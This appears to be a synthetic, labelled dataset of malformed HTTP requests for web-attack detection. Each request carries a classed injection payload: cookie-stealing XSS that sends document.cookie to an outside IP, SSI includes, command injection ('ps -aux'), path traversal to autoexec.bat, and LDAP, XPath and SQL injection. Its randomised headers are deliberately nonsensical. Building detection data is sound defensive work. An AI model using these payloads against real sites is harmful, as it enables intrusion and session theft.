GET /nn0aHyvmepied/sc@_xvNoi5KeO9gg@/esqtpreeintsssha2d/Sqp/cE7hB2wQ.KBGwR.sh?qSa3boot.ini38rhtaccesk=asg&shiV5sicfcdlz2=90&lxhcnadneo=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&nw=4_zLZPOvN6L&iaH=thsr&tasfhecs=29027624&oGtrehc=%24f7%3C%3D%7E+cO+aef%28&lcso3ke=kbreAcov&ztlrf8m=cetqiEoq0nec2avag8&s3=dmRfN&onR8eloWvkbsoad=dDpQh6_iP3%40&r7l=0456&ederwuwc=%3F%29ttnallt+lrshutdownRtc&7eEFcUe=0 HTTP/1.0
Host: www.wcOtli.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.8
Accept-Language: o-cbeossoa, crivi1-l4nna;q=0.7, hAy-b2eob
Cache-Control: no-transform
Client-ip: 68.175.116.43
Cookie: odbmfrsl32ethae=sPecuyc;oCoeg=ore/ e;KfZ-Kaw0netcat0=8870;Efrwa=eihqedtqsfkse3lria;eslshVetog=rPPWiw4SLZqp
Cookie2: $Version="40"
Date: Tue, 14 Apr 09 13:56:55 GMT
ETag: W/"Gmmz1vZc-Pdv.MyYSuu"
Expect: 100-continue
From: dtmxe@ioclgro.it
If-Modified-Since: Mon, 24 Jul 06 01:31:00 CET
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: *
If-None-Match: *
If-Range: "vXl6oPc_Wpv1p4b"
Max-Forwards: 8526
MIME-Version: 4.1
Pragma: le=oiwoe
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM dHJpZjFla3J3bnJlbnRpZnRybkllZWlTVml0bGlhYWg0c2xzb2lUdA==
Range: 049-19497,328865-,-538
Referer: /srmmejTb/dy4eTi/atbnu/oAo8d/leiElor.conf
TE: trailers,chunked
Trailer: TE
User-Agent: Mozilla/6.0 (X11; U; Solaris 8.5; lm-O6; rv:8.4.2) Gecko/89097585
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 278x2627
Via: HTTP/5.8 18.28.91.80
Transfer-Encoding: identity
Upgrade: PwodS/1.9, ioHu/9.4, qtRd/1.2, ipob/0.8, Hcsnyh/2.2
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40510
Start - Id: 38444
class: LdapInjection
GET /ey.t7TCeW/Z0gXexxml/ieZCCIbtHEVAEahXTpi/tx8htrcez/aQoLgUVdds369qA3updw/o7g0wtodt/8zg18M.msf?tz0u=hOaccess_logeg%2FoTt3Lla%7EedxD&56dtnvuRmooyje=0&isoz1pHeuldra=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&japr=1ecMuN&nt=2ifbchIMGn5mshutdownt&i1ozad=sh+naB%5Bbodyymhom&enladss=niac05ot5Tit0f&Lmsenyestc=32933666&eLew73v=s%24ihiD%26hawe2t&LandNB9wbgsoundA=isL6Htis3 HTTP/1.1
Host: www.Ndksd9sNn.gov
Connection: imy8Bae
Accept: */*
Accept-Charset: windows-1253;q=0.5, x-mac-arabic;q=0.2, macintosh, iso-8859-4, us-ascii
Accept-Encoding: *;q=0.6
Accept-Language: aiAEnn5-etldouQL, ieErdup-L3a3a;q=0.6
Cache-Control: no-cache
Client-ip: 149.59.68.247
Cookie: c2id=2i1oa
Cookie2: $Version="1"
Date: Tue, 04 Oct 05 18:43:32 UTC
ETag: "52QEXR1m9EuiAh57g@7I"
Expect: 100-continue
From: rrdhloR@le2p.gov
If-Modified-Since: Sun, 11 Dec 05 09:46:08 CET
If-Unmodified-Since: Tue, 03 Jan 06 09:15:11 CET
If-Match: "2ZPsCpvbwsDSLrsV"
If-None-Match: *
If-Range: "bGvh7y0uzwm5qZ8HAJC"
Max-Forwards: 42
MIME-Version: 3.3
Pragma: t=iqamirR
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest cnonce="ohrEir"
Range: 86309-
Referer: /nshuiae.cfm
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/3.7 (X11; U; Linux i386 5.7; hN-H7; rv:0.3.0) Gecko/39469562
UA-CPU: 68000
UA-Disp: 664,920,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38444
Start - Id: 47412
class: XSS
GET /5YPX.bin?mCtd7b9eeofct=370255029&irRerosihveeeu=n3cigtwD&csNHscsa=%3C%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F154.183.233.130%2Fas.aspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&twpht9lhd=06352190&ov=noEcp%40.NsSL&hen5ucc0olebal=HilewlleecqneRiCul&cumgv4K=ay&mftdn1ss=%25rszincludesahit1rja HTTP/1.0
Host: 99.36.50.143
Connection: keep-alive
Accept: application/rtf;q=0.9, application/zip
Accept-Charset: iso-8859-9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 71.102.4.108
Cookie: iEri=mp7iMiaran1e
Cookie2: $Version="78"
Date: Sun, 24 Sep 06 01:03:21 GMT
ETag: "DEh1qX9bUYN6ClxWCRw"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 08 May 05 02:59:54 UTC
If-Unmodified-Since: Tue, 07 Jul 09 12:56:47 CET
If-Match: *
If-None-Match: "DWaCN5fv8wwLn_7mv1H"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM VDdTY2VlZWJvbm5zaXlvcjdudHNjZnFOa2RzYWNsQUVhaGFpZTly
Range: -2021,0-2016
Referer: /uzsriwx/wfnsaaEa.jsp
TE: chunked,deflate
Trailer: If-Range
User-Agent: ml7bav6j0 http://www.ret09lnz.org
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/7.4 129.175.199.101, 5.3 www.epmt.css
Transfer-Encoding: deflate
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 067686
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47412
Start - Id: 35503
class: XPathInjection
GET /sC/nE7-7-5/989tpgt3I5/nSb@Qw3u5/WrLiInsdsdg.mspx? HTTP/1.1
Host: www.shIdomnwdf.be
Connection: ksssoorc
Accept: audio/*;q=0.8
Accept-Charset: iso-8859-8, x-mac-korean;q=0.0, iso-8859-1
Accept-Encoding: compress
Accept-Language: aeTa-oyu9n7dq;q=0.6, u-itotel;q=0.1, 1shlA9sg-mNesit0, f-a;q=0.2, Hsonx-depeoh
Cache-Control: no-cache
Client-ip: 181.43.90.86
Cookie: f2etc3whJoiG=oTwo;uu=799    or   count(path/child::node()[position()=((i+j+k+l+1)] | path/child::*()[position()=(k+1)])=1   or    577=;ohnsa=37063050;ifwo2a6godsde=oqlcMc4Rw8;ygLakaz=nA b;eeT9i=6
Cookie2: $Version="2"
Date: Mon, 09 May 05 17:46:37 GMT
ETag: "oX0ZLG2v9P.-wmTSWyiu"
Expect: 100-continue
If-Modified-Since: Sun, 10 Jan 10 02:27:01 UTC
If-Unmodified-Since: Sat, 09 May 09 03:12:19 CET
If-Match: *
If-None-Match: "OOffrqU_leoa2Aw"
If-Range: Thu, 11 Oct 07 17:17:45 GMT
Max-Forwards: 94
MIME-Version: 8.1
Pragma: ha=apitl
Authorization: Digest nonce
Range: 76101-
Referer: http://www.599taex.de/igqJma9s/diahppD/x5tH0t.shtml
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: s6rSChP http://www.sxrbl.it
Via: 0.4 71.64.1.77
Transfer-Encoding: deflate
Warning: 037 www.ramdut.png "awsh" 
X-Forwarded-For: 70.179.167.130
----: --------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35503
Start - Id: 37631
class: LdapInjection
POST /ksBhLEADDWwWWPRGL/laZZ-JqKE9CabpLqMO9r/GJ2IYY/sVP0YBSPqc/tKczp2mXkB9syE/laC/3tQYN1RoU0_jE.asp? HTTP/1.0
Content-Length: 82
Content-Language: h7smeeno,ee,0sd7btuf
Content-Encoding: deflate
Content-Location: /tkmmr9a/yihL.pdf
Content-MD5: SGV0YWFtdHdjZGVpVGF0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Jun 08 18:04:36 GMT
Last-Modified: Tue, 27 Jul 04 09:11:38 GMT
Host: 111.216.76.232
Connection: keep-alive
Accept: application/zip;q=0.0, audio/*;q=0.7
Accept-Charset: iso-2022-kr, iso-8859-6, utf-8;q=0.7, euc-jp;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=92
Client-ip: 216.154.187.217
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Sat, 11 Jul 09 05:49:05 GMT
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Mon, 22 Mar 10 23:42:07 UTC
If-Unmodified-Since: Sat, 24 Dec 05 03:52:41 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: *
If-Range: *
Max-Forwards: 6773
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: http://www.ojnheoco.fr/nihptrn1/nadrclga/leoa.gif
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (compatible; MSIE 3.9; Win98; viiJcXqeon; oTKo3c)
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: HTTP/1.3 www.fnbnled.js, 3.7 247.245.41.81
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 011740300898
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iP1joeesaeeeds=2082430&7nattott=dases)(&(objectClass  =   lsme*)&x5r=9

End - Id: 37631
Start - Id: 37175
class: LdapInjection
GET /ef/iI4m8uG31Wz/tRsnoeeNlkuod/nzsJDwWJkkg7_E/myauidpontFeyriaa/pXm/lsnsjfi27rrgl32oe.css?srxhtshjyxTwa=830605&deocwunmietato=30032&uUeBl=i&N6rdgt1ZlhDG=divltlocationnwn%26%2B&4uqLMfYFPP=hXLQPxDWli3&nmUN=556453605&fSuFanohoaoF=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&rSE5hqnn=58747995&kLeaeEend=09&aam1=4nstrht&LxtvG=cueerh&oregG@yB=feaiHnShvbdtHu HTTP/1.0
Host: 42.189.148.18
Connection: keep-alive
Accept: application/zip;q=0.6
Accept-Charset: windows-1251;q=0.5, x-mac-cyrillic;q=0.7, windows-1253;q=0.4, iso-8859-4;q=0.9, euc-kr;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 3.167.80.183
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="5"
Date: Sun, 02 Jan 05 17:11:24 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: pooroeeh=nA3Te;syttsT
From: aheoexc5@cnna.gov
If-Modified-Since: Tue, 16 Dec 08 16:41:42 CET
If-Unmodified-Since: Sun, 19 Jun 05 16:54:37 UTC
If-Match: "gDIYEnERGKzJ1LQgXkcr"
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: /eEri/tNit/Erii9.msf
TE: trailers,chunked
Trailer: Via
User-Agent: r3NTem/0.5
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 662 www.decsE.html "thSoIrea" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37175
Start - Id: 47955
class: XSS
GET /oQHtPLWKbfRaL/pNUXtEKHnxg9nwer6c/bensteirtcccztsmhsm/B-HL/ZzHTuHBJdm/lRonwr6Oen/uRhaYhbgtTfZ/cN_k_.js?ctwou2=512986318&atidh=stf&style.p.dZD=binUyhyolk-letr&aRds7ci=r&sdm4=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Balert++++%28%27iA4oaglh%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++%3E&he5ccadb4bs=0&xuWt=t9D&nlPxYite=Ndmhvue3insertiaet&uue4dyasudons=3987&headR=2AWFz&n3ubeur=304939&nftthicaeaotGf=659030416&nahe=m_U%40 HTTP/1.0
Host: www.mRhb.net
Connection: kurMEabd
Accept: image/gif
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.0, gzip, identity
Accept-Language: tuoeehg-7
Cache-Control: no-store
Client-ip: 120.235.185.123
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="803"
Date: Sat, 08 Nov 08 04:54:57 CET
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Wed, 20 Jun 07 09:51:48 GMT
If-Match: *
If-None-Match: "CRiilMO@fXgIVomv"
If-Range: *
Max-Forwards: 239
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: hSoia5 ulkateil=eoAtf
Range: -162,92-
Referer: /hSie/mEjth6/etYoarb/st5dmawy.jpeg
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 1.0; ua-t7; rv:0.9.9) Gecko/34390918
UA-CPU: 68000
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: 6.4 168.161.41.247, HTTP/0.7 www.ctiash3E.gif, 8m5e/3.0 16.75.192.106
Transfer-Encoding: identity
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47955
Start - Id: 40747
class: SSI
GET /8weQUfIWQIIN/tVC_2-NJ9MQhtacces.htm?9nnEk7I=b66sw5enbscript&lsa0a6AfrNd=46262&teeTmhrnn=zoteN45tmim+t6&edemsOtdooei9O=3i&e9koeYrst1mp5zr=7LCEm&ocroasAootqleit=eFUXP2&F7passwdKUoQf=6258&iSPZeX6Sg6yh=4%3Csd&ne9l4lfm=oetjClFaizdAi4a&i75replacepzMEiLW=73887&igv9=44287&hd0ahtttrtma=tcgBxFh&meca=wwtbuo%3C&ls=sBTJpk&msIafqscK=oaabRlb%40%5D HTTP/1.1
Host: www.rlnen6.st:83
Connection: u3o8Wb
Accept: image/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.6, deflate;q=0.6, compress;q=0.0
Accept-Language: ae-o7sSeaal, ttth-docs
Cache-Control: no-store
Cookie: E@ICZobjectIn=5;nwameeEse=<!--    #odbc    statement   = "select  eIacdt,     niHGoch,    ievRryyj   from    fiaT8O order by    3,     37,    9" -->
Cookie2: $Version="93"
Date: Sat, 25 Mar 06 06:03:50 GMT
If-Modified-Since: Fri, 28 Oct 05 13:35:52 GMT
If-Match: *
If-None-Match: "Yl.AGCrC6bfAIu1fj"
If-Range: *
Max-Forwards: 301
Proxy-Authorization: Basic QXNlblNjOmFpYXVybm8=
Authorization: Digest nonce
Referer: /eDph/ifeo/KdtaR/nrosn.asp
TE: trailers
User-Agent: Mozilla/2.9 (Windows; U; Win 9x 3.2; tr-6I; rv:0.7.0) Gecko/29352156
Via: 5.1 www.roogthl.jpg:95, 4.0 www.Yieiniib.css, FTP/9.5 247.2.207.83

null

End - Id: 40747
Start - Id: 36766
class: OsCommanding
GET /aPgQB@Y/h5gs2ncbped/aSg9vv1NopD8F7u6_/XUOQBformftpX_l4BQ/infqlpsB2FIXf/ioIRbecO1zJQs8-kE.mdb?HhttpN6@=%27+++%3B+++ps+++-aux+++++%3B&eoyskseijfno=9eyce HTTP/1.0
Host: 119.158.9.153
Connection: close
Accept: */*;q=0.4
Accept-Charset: big5, x-mac-korean, big5, iso-10646-ucs-2, ks_c_5601-1987;q=0.3
Accept-Encoding: gzip;q=0.4, deflate;q=0.2, gzip, gzip, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 175.79.197.116
Cookie: yjzsocysdtoos=8UfG86cVmu6;thIl=io;uRt3eursOommLu=7;n0nardcs4or1hQ=oiasrbho
Cookie2: $Version="22"
Date: Tue, 17 May 05 15:59:03 GMT
ETag: "bG0iOuAbRP_eNEv"
Expect: 100-continue
From: excu@itaiLs8n.it
If-Modified-Since: Fri, 09 Apr 04 23:57:10 GMT
If-Unmodified-Since: Fri, 11 Dec 09 22:33:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9770
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cavyd p9Spn=rbeshotc
Authorization: NTLM ZW04YWlyc2hIZGxSb2VvaWlpZXF6b2JzSW9hZWR0dHQ0cndtdG4=
Range: 8-,6-50
Referer: http://aod0.net/egcrmebb.mdb
TE: trailers,trailers
Trailer: If-Range
User-Agent: oeopTsYsuu/3.0
UA-CPU: 68000
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/7.1 91.205.193.172, HTTP/0.0 www.binr.shtml:72201
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36766
Start - Id: 45570
class: PathTransversal
GET /nafilhEsoe/nD6CNSi0iI-ICn/ordhttw2aThayhlHws/naUe5BiWAs/aaf-hMMXMA/io6bztvOF5GK5.htm?gfiaEo=ojzhkC&dUarUAhLYMd=ftptelneth%3Bmmocha8rteNtf%3Es&E1rlib=956579&tnE2ga=o%3Fel%3Ertdricwimochake&fa0g=iframe3w3h&Bthnercsdsl=%7El%29tman&nbFg1AnwVT=2+oo&h1oSgaa=..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.1
Host: 212.109.234.180:472
Connection: close
Accept: */*
Accept-Charset: windows-1252, ks_c_5601-1987;q=0.6, x-mac-cyrillic;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: atngte-yqO9tdan, dei-ie, i-mbnOe, i-e7apigs, 3sswh-ni;q=0.4
Cache-Control: HsEfutrs=iet
Client-ip: 80.183.70.158
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="99"
Date: Wed, 18 Apr 07 18:26:38 UTC
ETag: "ppgx5jsPtD_MggU"
Expect: 7Sjsoaml
From: nnmuo@mspetgyxi.de
If-Modified-Since: Mon, 12 Apr 10 18:31:44 CET
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "X9aWOG2g7DkPiP2AKB_"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: b7an3 ismsIo=k0ei
Range: -2
Referer: /unC1jrt/tAod/nnsirm/e8uc/cysulI.mp3
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: c0il/1.1.3.9.5
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 952x387
Via: hPI/3.9 www.uem3eaht.html
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 86157391207979195
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45570
Start - Id: 41567
class: SqlInjection
GET /oW2/aYwVfT1FBj/aztalzube/3Xrlwemexswi7NtS/LH974xw3tmgn4Y/ezsaezasw/9xpl@TT6gv-/8btZ9Y9NzxrcpG5Ai/p@jMg.QsNAgM.png?sna=o+aJ2e%2Beo%3Blfs-%3C&as=4TNqj1EC_ryq&tJPin16Ll1Cmochal=ef_pMdqL6&orgrcdme=Eir&WE6hKni0EONdelete=n+aeem+ama%24%3Ay&ris4wtoeo9at=wveee&e2tIRirt6=edropesserviceslhmyaOhcwconnect&es=84381343&monaufsi=+teix%5Ccgroup+byTsCusvaktc-i&sda=rgryNGD&dNT605fHaG=sliNslrnont5oc4&e5etS=eiO2duot6ikrahrona&zsom=%27++OR+%27tnappy%27+BETWEEN+++++%27R%27+AND+++++%27T&lfrmacn=r%3EtttiY0dtdsrn9 HTTP/1.0
Host: www.eetexsti.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish
Accept-Encoding: compress, compress, identity, compress;q=0.5
Accept-Language: *
Cache-Control: ylhac='s4'
Client-ip: 215.163.226.165
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="102"
Date: Wed, 12 Oct 05 11:44:58 UTC
ETag: "z6VIV4-V9ClcxJYf"
Expect: oAcs=EcpeLe
From: usaacy07@scsi6.be
If-Modified-Since: Fri, 29 Oct 04 07:50:06 GMT
If-Unmodified-Since: Thu, 09 Oct 08 12:48:26 UTC
If-Match: *
If-None-Match: "8WENARQdVZLlky.6w"
If-Range: Fri, 12 May 06 13:14:42 GMT
Max-Forwards: 046
MIME-Version: 3.9
Pragma: ine='ennr4'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM ZHRlYWxlb2NlemlhdHNZN3JhYW9hbXdsMGtvY2tyb2RhdTVudElEbXF0
Range: 629953-,-3
Referer: /peis9ci/nrt3ioek.asp
TE: trailers,gzip,chunked
Trailer: If-Range
User-Agent: pecjftI/6.3.0.5
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/9.9 181.191.40.93, 9.3 243.126.203.94
Transfer-Encoding: tuEad; aeweT3es=A5neta
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41567
Start - Id: 46860
class: XSS
PUT /X@/nV5B-gDQcjGoB@0F/Yoniioaelen1ea6/csr9gamNtlStoo/fNtayesEe/ilQ1IDqckHg/Btetnhdmerd9nr/in2xp_7YHsVOmetaIiY/iLSvkchildSHiRX.gif? HTTP/1.1
Content-Length: 89
Content-Language: noEiiy
Content-Encoding: deflate
Content-Location: http://www.es5L.it/f1reGsPw.mpg
Content-MD5: dGFkbW90bzJhck9vbGV2bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Tue, 06 Nov 07 18:16:10 UTC
Host: 153.60.126.196
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 152.154.47.47
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="134"
Date: Thu, 28 Oct 04 20:15:14 GMT
ETag: "ynNtDqxUiypefBzDU"
Expect: ascq
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Wed, 19 Jul 06 09:52:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2853
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 6262-,10870-70169
Referer: http://www.lnenZNe.fr/nsei.sh
TE: gzip,trailers
Trailer: Referer
User-Agent: tat1htnrGu
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 758x384
Via: FTP/9.3 www.pytiscf.jpg
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eqhnyc0lrnnmont=<div  onmouseover    =" [alert('hsih2ia8as');]" >

End - Id: 46860
Start - Id: 41497
class: SqlInjection
PUT /d0SLS84G0/mh4mawllDi8ry2leriql/e4jBUqOYtW2HYGY3z/epI8.tiff? HTTP/1.1
Content-Length: 263
Content-Language: ia8lf
Content-Encoding: deflate
Content-Location: /uE0a/IieiAhu/cT5a93Am/fs3n.swf
Content-MD5: bUloTnNvMmVMZHJlcnJ3eA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 18:36:01 GMT
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.uEtf.ch:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-korean, x-mac-turkish;q=0.3, x-mac-arabic;q=0.3, x-mac-arabic, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=03
Client-ip: 221.158.6.21
Cookie: smabmitsCni=oIo0fZkmVQL;ZKkROO1openpR=4fs7nyieA;EuNipdGhCybei=dsno1deleteo;meearUthydiiH=uh3e8aDneoei7r;eeiaAwngcarnnfh=ld7S;drtouuzelHae=aemirrlet
Cookie2: $Version="965"
Date: Wed, 20 Apr 05 05:09:35 UTC
ETag: W/"NnRIYgITDhjc.iBg"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: "th3lyxRd9U4FTWxVZa"
Max-Forwards: 370
MIME-Version: 5.5
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: /wElthoFa/cNoaegn/obTsec.php4
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: tlbMteawmRut
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/0.8 www.welddp.shtml, 4.2 169.122.156.182
Transfer-Encoding: deflate
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 131.117.242.175
X-Serial-Number: 6237226305508453843
----: ----------------
